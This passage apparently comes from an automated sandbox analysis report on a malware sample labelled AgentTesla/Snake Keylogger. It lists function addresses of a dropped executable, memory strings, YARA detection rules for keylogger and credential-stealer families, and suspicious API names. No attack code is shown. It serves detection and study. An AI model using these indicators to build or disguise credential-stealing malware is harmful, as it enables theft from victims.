Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9C1AB	15_2_00F9C1AB
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9D28B	15_2_00F9D28B
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9C47B	15_2_00F9C47B
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9C74B	15_2_00F9C74B
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F929E0	15_2_00F929E0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F969A0	15_2_00F969A0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9E988	15_2_00F9E988
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9CA08	15_2_00F9CA08
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9CCD8	15_2_00F9CCD8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F96FC8	15_2_00F96FC8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9CFBB	15_2_00F9CFBB
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F95383	15_2_00F95383
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F9F960	15_2_00F9F960
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_00F93E09	15_2_00F93E09
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525FC68	15_2_0525FC68
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525E6B0	15_2_0525E6B0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525D540	15_2_0525D540
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05259548	15_2_05259548
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525D550	15_2_0525D550
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525DDF1	15_2_0525DDF1
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05259C18	15_2_05259C18
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525CCA0	15_2_0525CCA0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525EF60	15_2_0525EF60
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525EF51	15_2_0525EF51
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_052517A0	15_2_052517A0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525178F	15_2_0525178F
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525DE00	15_2_0525DE00
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05251E70	15_2_05251E70
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525E6A0	15_2_0525E6A0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05251E80	15_2_05251E80
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05252968	15_2_05252968
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525295A	15_2_0525295A
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525D9A8	15_2_0525D9A8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525D999	15_2_0525D999
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05255028	15_2_05255028
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525003F	15_2_0525003F
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525F802	15_2_0525F802
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05250016	15_2_05250016
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525F810	15_2_0525F810
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05255018	15_2_05255018
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05250040	15_2_05250040
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525D0F8	15_2_0525D0F8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05250B20	15_2_05250B20
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05259328	15_2_05259328
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05250B30	15_2_05250B30
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525EB08	15_2_0525EB08
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05258BA0	15_2_05258BA0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525F3A8	15_2_0525F3A8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525F3B8	15_2_0525F3B8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525E24A	15_2_0525E24A
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525E258	15_2_0525E258
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0525EAF8	15_2_0525EAF8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059381D0	15_2_059381D0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593E9D8	15_2_0593E9D8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05938FB0	15_2_05938FB0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05937B78	15_2_05937B78
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05931190	15_2_05931190
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059311A0	15_2_059311A0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593C9D8	15_2_0593C9D8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593E9C8	15_2_0593E9C8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059315F8	15_2_059315F8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593C9E8	15_2_0593C9E8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059315E8	15_2_059315E8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593A938	15_2_0593A938
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593E538	15_2_0593E538
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593A928	15_2_0593A928
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593C558	15_2_0593C558
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05930D48	15_2_05930D48
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593E548	15_2_0593E548
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593C548	15_2_0593C548
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05930498	15_2_05930498
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05930489	15_2_05930489
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936488	15_2_05936488
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593C0B7	15_2_0593C0B7
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059338B8	15_2_059338B8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593E0B8	15_2_0593E0B8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593E0A7	15_2_0593E0A7
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593C0C8	15_2_0593C0C8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059308F0	15_2_059308F0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059308E0	15_2_059308E0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593DC19	15_2_0593DC19
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593FC18	15_2_0593FC18
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05930006	15_2_05930006
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05933008	15_2_05933008
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936030	15_2_05936030
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593BC38	15_2_0593BC38
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936022	15_2_05936022
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593BC2A	15_2_0593BC2A
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593DC28	15_2_0593DC28
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593345F	15_2_0593345F
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05930040	15_2_05930040
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936478	15_2_05936478
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05933460	15_2_05933460
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593D798	15_2_0593D798
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593B798	15_2_0593B798
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05935780	15_2_05935780
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593D787	15_2_0593D787
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593F788	15_2_0593F788
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05932BB0	15_2_05932BB0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05938FA1	15_2_05938FA1
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593B7A8	15_2_0593B7A8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05932BAF	15_2_05932BAF
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05935BD8	15_2_05935BD8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05932FF9	15_2_05932FF9
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05937710	15_2_05937710
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593531A	15_2_0593531A
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593B318	15_2_0593B318
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05932300	15_2_05932300
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593B307	15_2_0593B307
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593D308	15_2_0593D308
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05937720	15_2_05937720
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05935328	15_2_05935328
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05932758	15_2_05932758
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05932748	15_2_05932748
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05937B77	15_2_05937B77
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593F778	15_2_0593F778
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05931E98	15_2_05931E98
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059372B8	15_2_059372B8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05931EA8	15_2_05931EA8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05934ED0	15_2_05934ED0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05934EC2	15_2_05934EC2
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059372C8	15_2_059372C8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_059322F0	15_2_059322F0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593D2F7	15_2_0593D2F7
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593F2F8	15_2_0593F2F8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593F2E7	15_2_0593F2E7
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05934610	15_2_05934610
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936A18	15_2_05936A18
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936A07	15_2_05936A07
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05934620	15_2_05934620
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05931A50	15_2_05931A50
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593EE57	15_2_0593EE57
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05931A41	15_2_05931A41
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936E70	15_2_05936E70
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05934A78	15_2_05934A78
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593CE78	15_2_0593CE78
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05936E62	15_2_05936E62
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593CE67	15_2_0593CE67
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_0593EE68	15_2_0593EE68
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 15_2_05934A68	15_2_05934A68

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2151717409.00000000051F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2148454163.0000000002951000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2146637599.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2153197983.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2156204365.000000000A1E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevZml.exe8 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2148454163.000000000299A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000444000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587625154.00000000007B7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Binary or memory string: OriginalFilenamevZml.exe8 vs SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xRAvleeiuDbJ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, fuQMSDTExTVdQxuWmx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, fuQMSDTExTVdQxuWmx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
